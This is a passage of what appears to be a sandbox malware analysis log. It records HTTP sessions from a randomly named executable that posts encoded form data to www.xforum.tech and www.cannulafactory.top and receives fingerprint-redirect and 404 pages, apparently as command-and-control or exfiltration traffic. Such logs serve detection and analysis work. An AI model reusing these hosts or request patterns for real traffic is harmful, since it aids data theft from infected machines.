                      Data Raw: 58 6e 37 30 5f 3d 49 6c 79 33 43 65 55 32 73 2b 71 41 36 41 52 35 2b 7a 37 30 77 45 43 6b 58 4f 6b 77 30 43 2f 63 36 74 73 57 2b 58 34 4d 4a 4b 56 47 36 58 38 51 76 62 74 55 4e 61 47 64 47 61 76 4b 48 79 4e 72 37 65 65 38 2b 46 4e 6d 2f 63 38 56 53 69 56 74 79 58 77 56 6a 68 44 62 72 4e 7a 30 6e 30 38 59 56 77 55 47 74 4b 69 45 53 66 63 7a 5a 30 74 64 63 6d 6d 69 68 55 73 33 57 31 6e 46 41 6b 2b 33 64 41 6b 75 38 74 6e 52 47 2f 75 58 4e 73 4e 36 36 66 6e 78 71 4f 43 56 7a 66 67 71 67 62 73 49 74 61 58 30 68 4f 73 49 36 67 6a 76 62 74 39 6c 36 53 63 48 64 4f 55 71 7a 61 70 54 53 58 70 6b 52 74 6c 79 48 37 49 74 58 32 4b 71 70 59 56 57 62 62 67 6c 6e 56 57 68 58 75 59 55 55 4a 43 39 64 67 3d 3d
                      Data Ascii: Xn70_=Ily3CeU2s+qA6AR5+z70wECkXOkw0C/c6tsW+X4MJKVG6X8QvbtUNaGdGavKHyNr7ee8+FNm/c8VSiVtyXwVjhDbrNz0n08YVwUGtKiESfczZ0tdcmmihUs3W1nFAk+3dAku8tnRG/uXNsN66fnxqOCVzfgqgbsItaX0hOsI6gjvbt9l6ScHdOUqzapTSXpkRtlyH7ItX2KqpYVWbbglnVWhXuYUUJC9dg==
                      Aug 23, 2024 08:27:20.896748066 CEST872INHTTP/1.1 200 OK
                      date: Fri, 23 Aug 2024 06:27:20 GMT
                      server: Apache
                      set-cookie: __tad=1724394440.4608183; expires=Mon, 21-Aug-2034 06:27:20 GMT; Max-Age=315360000
                      vary: Accept-Encoding
                      content-encoding: gzip
                      content-length: 577
                      content-type: text/html; charset=UTF-8
                      connection: close
                      Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f 9c 30 10 3d 2f bf 62 44 0e b0 4a 83 37 4a 9b 48 bb 40 0f 95 2a b5 ea a1 4a da 73 e5 98 61 71 02 36 b5 87 fd 50 b4 ff bd 63 96 7c b4 95 9a fa 02 1e bf 37 6f de 30 26 6f a8 6b cb 28 6f 50 56 fc 20 4d 2d 96 bb da ba a1 cb 08 55 93 8b 63 28 ca bd 72 ba 27 a0 7d 8f 45 4c b8 23 71 27 37 f2 18 8d c1 3b 55 c4 e2 ce 8b 5a 9b 35 ba de 69 43 42 eb 1a b3 4e 9b ec ce c7 65 2e 8e d8 d7 52 95 d1 46 3a 70 58 69 87 8a 7e b4 da dc 43 01 49 43 d4 2f 85 d8 6e b7 d9 8b f2 c4 e5 db ab 9d 78 9f ac a2 48 08 b8 41 02 09 a4 3b b4 03 81 ad e1 62 b1 80 4e 2b 67 3d 2a 6b 2a 0f 64 01 77 a8 06 42 06 3e 6a 80 ae 81 1a 84 17 a5 43 ef 6c a7 3d c7 a4 6e 3d b0 20 78 db 21 53 a4 b7 26 aa 07 a3 48 5b c3 c7 6d 7b 2b d5 fd f5 94 2a 9d c3 43 34 db 6a 53 d9 6d d6 5a 25 03 2a 73 d8 b7 52 61 fa 9b a9 d3 a4 ee 8b b3 ab 64 be 8a 0e 51 44 6e 1f 98 5c a5 27 70 95 fb 36 99 28 c0 23 4d 9b f4 4f b5 37 c1 20 f3 67 a1 63 75 ff 75 aa b9 80 8f cf 4e 3e df 70 1d b2 4a 1f 3a 6b 34 59 0e ad 97 a1 6c 8f 87 c0 7c 62 [TRUNCATED]
                      Data Ascii: TMo0=/bDJ7JH@*Jsaq6Pc|7o0&ok(oPV M-Uc(r'}EL#q'7;UZ5iCBNe.RF:pXi~CIC/nxHA;bN+g=*k*dwB>jCl=n= x!S&H[m{+*C4jSmZ%*sRadQDn\'p6(#MO7 gcuuN>pJ:k4Yl|bEYM0iCQrllgC? 'av#"h>UZgw+P;wrhcFCL<9_K8G0oI=v1.ERi`URupZABWXN!q^x?)b71x_Wece


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      23192.168.2.649745103.224.182.242806008C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      TimestampBytes transferredDirectionData
                      Aug 23, 2024 08:27:22.857660055 CEST1788OUTPOST /647x/ HTTP/1.1
                      Host: www.xforum.tech
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.xforum.tech
                      Referer: http://www.xforum.tech/647x/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 1246
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Data Raw: 58 6e 37 30 5f 3d 49 6c 79 33 43 65 55 32 73 2b 71 41 36 41 52 35 2b 7a 37 30 77 45 43 6b 58 4f 6b 77 30 43 2f 63 36 74 73 57 2b 58 34 4d 4a 4b 74 47 36 6b 30 51 73 38 5a 55 4b 61 47 64 4f 36 76 50 48 79 4e 4d 37 61 79 34 2b 46 78 70 2f 66 45 56 54 41 64 74 30 6d 77 56 73 68 44 62 6b 74 7a 33 6a 30 38 52 56 77 45 43 74 4f 47 45 53 66 63 7a 5a 32 46 64 4b 6e 6d 69 79 45 73 77 66 56 6e 5a 45 6b 2b 66 64 45 41 2b 38 74 54 76 47 4d 6d 58 44 73 39 36 35 70 62 78 69 4f 43 54 77 66 67 79 67 62 6f 62 74 61 36 50 68 4f 5a 74 36 67 58 76 62 59 77 71 6e 77 59 46 50 63 4a 4a 75 39 52 5a 56 7a 56 6a 51 72 6c 51 45 59 6f 4a 58 56 69 4f 71 4e 49 56 66 35 78 6f 6f 6a 6d 31 55 59 70 49 43 6f 79 30 65 49 6f 57 68 34 62 42 77 52 31 65 53 71 59 35 70 49 53 4b 32 4d 48 52 48 4d 65 72 52 6a 74 30 4b 77 65 39 4c 72 6e 68 6c 63 52 49 51 4d 35 6a 4a 31 4f 51 6f 46 45 77 38 62 64 72 74 56 37 2b 73 2f 56 32 6a 30 71 75 6e 47 38 6f 6a 53 30 42 57 67 44 68 64 64 73 62 65 71 71 4b 48 33 33 77 58 30 42 4f 32 62 4a 77 65 54 41 64 [TRUNCATED]
                      Data Ascii: Xn70_=Ily3CeU2s+qA6AR5+z70wECkXOkw0C/c6tsW+X4MJKtG6k0Qs8ZUKaGdO6vPHyNM7ay4+Fxp/fEVTAdt0mwVshDbktz3j08RVwECtOGESfczZ2FdKnmiyEswfVnZEk+fdEA+8tTvGMmXDs965pbxiOCTwfgygbobta6PhOZt6gXvbYwqnwYFPcJJu9RZVzVjQrlQEYoJXViOqNIVf5xoojm1UYpICoy0eIoWh4bBwR1eSqY5pISK2MHRHMerRjt0Kwe9LrnhlcRIQM5jJ1OQoFEw8bdrtV7+s/V2j0qunG8ojS0BWgDhddsbeqqKH33wX0BO2bJweTAdYv8Q6qCs0+mHmVYDLkjP/nxFtnNP7rJZznTpoIlL/xH8v+rYLaXVtTaRfbPor7ujW/Ww/74ci3DbAULPL/RPR9+suJ1V8P2tXkPk7XXpxY53mVXFepjo5hyy4WoDbQqJgwIZ8fIPQoA9nxjU8Y/NznwaICVZy31ijGkzM6VKfym4G3OL5IChyKmE8vvO90PE+SFV7lal0IpexaRFNfqjT4ZCLi/nx7J/Xoo3BnNh4GcF+RV8bY6PHqY6nPTal/zKLA0TLS3C0Ht9qo+eGjUGJKkWiVzCBXN0cQvvLPJZ2GjprfWHc6Zor9MHdCkKshu2z9CO2UcS+tIZ0tkVs7OAZ19J0s5MtUBjGFJmIdi/vB7EVoa5V4bN1cF2Reis8OmpZvyS4IIC8dlgZufvOVv/eGTxhdI5XlrklYKInO98Lf7Ytkj2B8oecbZpulKWh1LEBv30OgXCfV6P/mJL/aMOERO1fuut9MCKoEC8pX1KFlzkZoOODnVYS5p2yBtcKtInzvhNRbB3xdxaou4XZcjwQ/crRb52cH/fwm1FA6f+I9GDKg9FwxJyUqS1TiLTd3b1C06d+PDV7kWS0K0P6y8/WVDU95VUGg/ogpwmvtoaYcwniEuNXJDzgeH6enowb4VqL81nrvnGdoIL+UchzFaTQeepugJeKhynJC [TRUNCATED]
                      Aug 23, 2024 08:27:23.463891029 CEST872INHTTP/1.1 200 OK
                      date: Fri, 23 Aug 2024 06:27:23 GMT
                      server: Apache
                      set-cookie: __tad=1724394443.6196117; expires=Mon, 21-Aug-2034 06:27:23 GMT; Max-Age=315360000
                      vary: Accept-Encoding
                      content-encoding: gzip
                      content-length: 577
                      content-type: text/html; charset=UTF-8
                      connection: close
                      Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f 9c 30 10 3d 2f bf 62 44 0e b0 4a 83 37 4a 9b 48 bb 40 0f 95 2a b5 ea a1 4a da 73 e5 98 61 71 02 36 b5 87 fd 50 b4 ff bd 63 96 7c b4 95 9a fa 02 1e bf 37 6f de 30 26 6f a8 6b cb 28 6f 50 56 fc 20 4d 2d 96 bb da ba a1 cb 08 55 93 8b 63 28 ca bd 72 ba 27 a0 7d 8f 45 4c b8 23 71 27 37 f2 18 8d c1 3b 55 c4 e2 ce 8b 5a 9b 35 ba de 69 43 42 eb 1a b3 4e 9b ec ce c7 65 2e 8e d8 d7 52 95 d1 46 3a 70 58 69 87 8a 7e b4 da dc 43 01 49 43 d4 2f 85 d8 6e b7 d9 8b f2 c4 e5 db ab 9d 78 9f ac a2 48 08 b8 41 02 09 a4 3b b4 03 81 ad e1 62 b1 80 4e 2b 67 3d 2a 6b 2a 0f 64 01 77 a8 06 42 06 3e 6a 80 ae 81 1a 84 17 a5 43 ef 6c a7 3d c7 a4 6e 3d b0 20 78 db 21 53 a4 b7 26 aa 07 a3 48 5b c3 c7 6d 7b 2b d5 fd f5 94 2a 9d c3 43 34 db 6a 53 d9 6d d6 5a 25 03 2a 73 d8 b7 52 61 fa 9b a9 d3 a4 ee 8b b3 ab 64 be 8a 0e 51 44 6e 1f 98 5c a5 27 70 95 fb 36 99 28 c0 23 4d 9b f4 4f b5 37 c1 20 f3 67 a1 63 75 ff 75 aa b9 80 8f cf 4e 3e df 70 1d b2 4a 1f 3a 6b 34 59 0e ad 97 a1 6c 8f 87 c0 7c 62 [TRUNCATED]
                      Data Ascii: TMo0=/bDJ7JH@*Jsaq6Pc|7o0&ok(oPV M-Uc(r'}EL#q'7;UZ5iCBNe.RF:pXi~CIC/nxHA;bN+g=*k*dwB>jCl=n= x!S&H[m{+*C4jSmZ%*sRadQDn\'p6(#MO7 gcuuN>pJ:k4Yl|bEYM0iCQrllgC? 'av#"h>UZgw+P;wrhcFCL<9_K8G0oI=v1.ERi`URupZABWXN!q^x?)b71x_Wece


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      24192.168.2.649746103.224.182.242806008C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      TimestampBytes transferredDirectionData
                      Aug 23, 2024 08:27:25.400645971 CEST502OUTGET /647x/?mV=ZpN4DLSXOzy8qX&Xn70_=FnaXBox54+ag7g5huWPEmVuBH/Jm8y343eRchhJyHcxj2nBsvZZTTofBDuDrTRxDwJS/xlxq28wFbCJ7okUpgzDZpO2xsWAnZCQe5aiqUqIaOEJzM3y652oxbgTObGuSO3B10Kw= HTTP/1.1
                      Host: www.xforum.tech
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Connection: close
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Aug 23, 2024 08:27:26.008981943 CEST1236INHTTP/1.1 200 OK
                      date: Fri, 23 Aug 2024 06:27:25 GMT
                      server: Apache
                      set-cookie: __tad=1724394445.3736214; expires=Mon, 21-Aug-2034 06:27:25 GMT; Max-Age=315360000
                      vary: Accept-Encoding
                      content-length: 1539
                      content-type: text/html; charset=UTF-8
                      connection: close
                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 78 66 6f 72 75 6d 2e 74 65 63 68 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 66 69 6e 67 65 72 70 72 69 6e 74 2f 69 69 66 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 76 61 72 20 72 65 64 69 72 65 63 74 5f 6c 69 6e 6b 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 78 66 6f 72 75 6d 2e 74 65 63 68 2f 36 34 37 78 2f 3f 6d 56 3d 5a 70 4e 34 44 4c 53 58 4f 7a 79 38 71 58 26 58 6e 37 30 5f 3d 46 6e 61 58 42 6f 78 35 34 2b 61 67 37 67 35 68 75 57 50 45 6d 56 75 42 48 2f 4a 6d 38 79 33 34 33 65 52 63 68 68 4a 79 48 63 78 6a 32 6e 42 73 76 5a 5a 54 54 6f 66 42 44 75 44 72 54 52 78 44 77 4a 53 2f 78 6c 78 71 32 38 77 46 62 43 4a 37 6f 6b 55 70 67 7a 44 5a 70 4f 32 78 73 57 41 6e 5a 43 51 65 35 61 69 71 55 71 49 61 4f 45 4a 7a 4d 33 79 36 [TRUNCATED]
                      Data Ascii: <html><head><title>xforum.tech</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.xforum.tech/647x/?mV=ZpN4DLSXOzy8qX&Xn70_=FnaXBox54+ag7g5huWPEmVuBH/Jm8y343eRchhJyHcxj2nBsvZZTTofBDuDrTRxDwJS/xlxq28wFbCJ7okUpgzDZpO2xsWAnZCQe5aiqUqIaOEJzM3y652oxbgTObGuSO3B10Kw=&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><body
                      Aug 23, 2024 08:27:26.009036064 CEST575INData Raw: 62 67 63 6f 6c 6f 72 3d 22 23 66 66 66 66 66 66 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 27 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e
                      Data Ascii: bgcolor="#ffffff" text="#000000"><div style='display: none;'><a href='http://www.xforum.tech/647x/?mV=ZpN4DLSXOzy8qX&Xn70_=FnaXBox54+ag7g5huWPEmVuBH/Jm8y343eRchhJyHcxj2nBsvZZTTofBDuDrTRxDwJS/xlxq28wFbCJ7okUpgzDZpO2xsWAnZCQe5aiqUqIaOEJzM3y652o


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      25192.168.2.64974718.183.3.45806008C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      TimestampBytes transferredDirectionData
                      Aug 23, 2024 08:27:31.735064983 CEST772OUTPOST /l90v/ HTTP/1.1
                      Host: www.cannulafactory.top
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.cannulafactory.top
                      Referer: http://www.cannulafactory.top/l90v/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 210
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Data Raw: 58 6e 37 30 5f 3d 33 37 46 54 39 49 48 44 50 4f 41 4b 66 54 67 75 6c 36 77 7a 79 2f 41 41 76 44 6d 76 72 69 37 37 77 6b 75 79 56 6d 4f 50 59 41 56 45 72 38 37 71 5a 4c 33 57 63 37 34 69 48 30 65 45 62 4a 4b 6e 6a 56 6b 73 58 59 67 6b 50 73 6c 6b 4c 45 6e 33 76 36 44 59 4f 52 6d 61 2f 2f 69 54 52 70 69 58 2f 32 7a 57 6d 75 35 69 61 4f 68 77 44 6e 5a 53 57 50 55 7a 72 77 57 6c 51 6a 77 70 4a 6f 64 42 30 54 6a 2f 6b 31 32 71 7a 38 41 7a 39 66 6d 76 45 46 41 2f 6e 38 67 48 32 59 6e 56 6e 33 65 61 76 48 6b 73 43 4a 56 6c 6c 6c 43 35 77 74 46 34 53 56 2f 4a 6c 57 33 52 63 31 30 41 4a 37 2b 30 4b 67 31 43 33 76 6c 67 59 77 78 50
                      Data Ascii: Xn70_=37FT9IHDPOAKfTgul6wzy/AAvDmvri77wkuyVmOPYAVEr87qZL3Wc74iH0eEbJKnjVksXYgkPslkLEn3v6DYORma//iTRpiX/2zWmu5iaOhwDnZSWPUzrwWlQjwpJodB0Tj/k12qz8Az9fmvEFA/n8gH2YnVn3eavHksCJVlllC5wtF4SV/JlW3Rc10AJ7+0Kg1C3vlgYwxP
                      Aug 23, 2024 08:27:32.505795002 CEST1236INHTTP/1.1 404 Not Found
                      Server: nginx/1.20.1
                      Date: Fri, 23 Aug 2024 06:27:32 GMT
                      Content-Type: text/html
                      Content-Length: 3971
                      Connection: close
                      ETag: "6526681e-f83"
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #900; color: #fff; font-weight: normal; [TRUNCATED]
                      Aug 23, 2024 08:27:32.505810022 CEST1236INData Raw: 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20
                      Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #90
                      Aug 23, 2024 08:27:32.505821943 CEST1236INData Raw: 6e 67 3e 6e 67 69 6e 78 20 65 72 72 6f 72 21 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 33 3e 54 68 65 20
                      Data Ascii: ng>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content">
                      Aug 23, 2024 08:27:32.505826950 CEST436INData Raw: 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 67 69 6e 78 2e 6e 65 74 2f 22 3e 3c 69 6d 67 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 3d 22 6e 67 69 6e 78 2d 6c 6f 67 6f 2e 70 6e 67 22 20 0a 20 20 20 20 20 20 20 20
                      Data Ascii: a href="http://nginx.net/"><img src="nginx-logo.png" alt="[ Powered by nginx ]" width="121" height="32" /></a> <a href="http://www.redhat.com/"><img


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      26192.168.2.64974818.183.3.45806008C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      TimestampBytes transferredDirectionData
                      Aug 23, 2024 08:27:34.279300928 CEST796OUTPOST /l90v/ HTTP/1.1
                      Host: www.cannulafactory.top
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.cannulafactory.top
                      Referer: http://www.cannulafactory.top/l90v/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 234
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Data Raw: 58 6e 37 30 5f 3d 33 37 46 54 39 49 48 44 50 4f 41 4b 65 77 34 75 67 59 59 7a 36 2f 41 44 6c 6a 6d 76 69 43 37 6e 77 6b 79 79 56 6e 4b 66 59 57 6c 45 6f 64 4c 71 4c 61 33 57 5a 37 34 69 50 55 65 42 55 70 4b 73 6a 56 6f 43 58 5a 63 6b 50 6f 4e 6b 4c 41 6a 33 75 4a 62 5a 4f 42 6d 63 79 66 69 52 66 4a 69 58 2f 32 7a 57 6d 75 64 63 61 4f 70 77 41 58 4a 53 55 74 73 77 30 41 57 6d 52 6a 77 70 66 59 64 46 30 54 6a 4a 6b 30 72 4e 7a 2b 6f 7a 39 61 61 76 45 52 63 38 73 38 67 42 70 49 6d 6c 6d 6b 43 53 32 6c 73 78 4b 34 45 43 6b 30 65 34 78 62 45 69 4f 6d 2f 71 33 47 58 54 63 33 73 79 4a 62 2b 65 49 67 4e 43 6c 34 70 48 58 45 55 73 5a 6d 39 42 78 4d 6a 67 57 30 50 46 6e 4e 52 6d 6f 67 54 43 70 67 3d 3d
                      Data Ascii: Xn70_=37FT9IHDPOAKew4ugYYz6/ADljmviC7nwkyyVnKfYWlEodLqLa3WZ74iPUeBUpKsjVoCXZckPoNkLAj3uJbZOBmcyfiRfJiX/2zWmudcaOpwAXJSUtsw0AWmRjwpfYdF0TjJk0rNz+oz9aavERc8s8gBpImlmkCS2lsxK4ECk0e4xbEiOm/q3GXTc3syJb+eIgNCl4pHXEUsZm9BxMjgW0PFnNRmogTCpg==
                      Aug 23, 2024 08:27:35.048188925 CEST1236INHTTP/1.1 404 Not Found
                      Server: nginx/1.20.1
                      Date: Fri, 23 Aug 2024 06:27:34 GMT
                      Content-Type: text/html
                      Content-Length: 3971
                      Connection: close
                      ETag: "6526681e-f83"
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #900; color: #fff; font-weight: normal; [TRUNCATED]
                      Aug 23, 2024 08:27:35.048260927 CEST1236INData Raw: 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20
                      Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #90
                      Aug 23, 2024 08:27:35.048265934 CEST1236INData Raw: 6e 67 3e 6e 67 69 6e 78 20 65 72 72 6f 72 21 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 33 3e 54 68 65 20
                      Data Ascii: ng>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content">
                      Aug 23, 2024 08:27:35.048276901 CEST436INData Raw: 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 67 69 6e 78 2e 6e 65 74 2f 22 3e 3c 69 6d 67 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 3d 22 6e 67 69 6e 78 2d 6c 6f 67 6f 2e 70 6e 67 22 20 0a 20 20 20 20 20 20 20 20
                      Data Ascii: a href="http://nginx.net/"><img src="nginx-logo.png" alt="[ Powered by nginx ]" width="121" height="32" /></a> <a href="http://www.redhat.com/"><img


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      27192.168.2.64974918.183.3.45806008C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      TimestampBytes transferredDirectionData
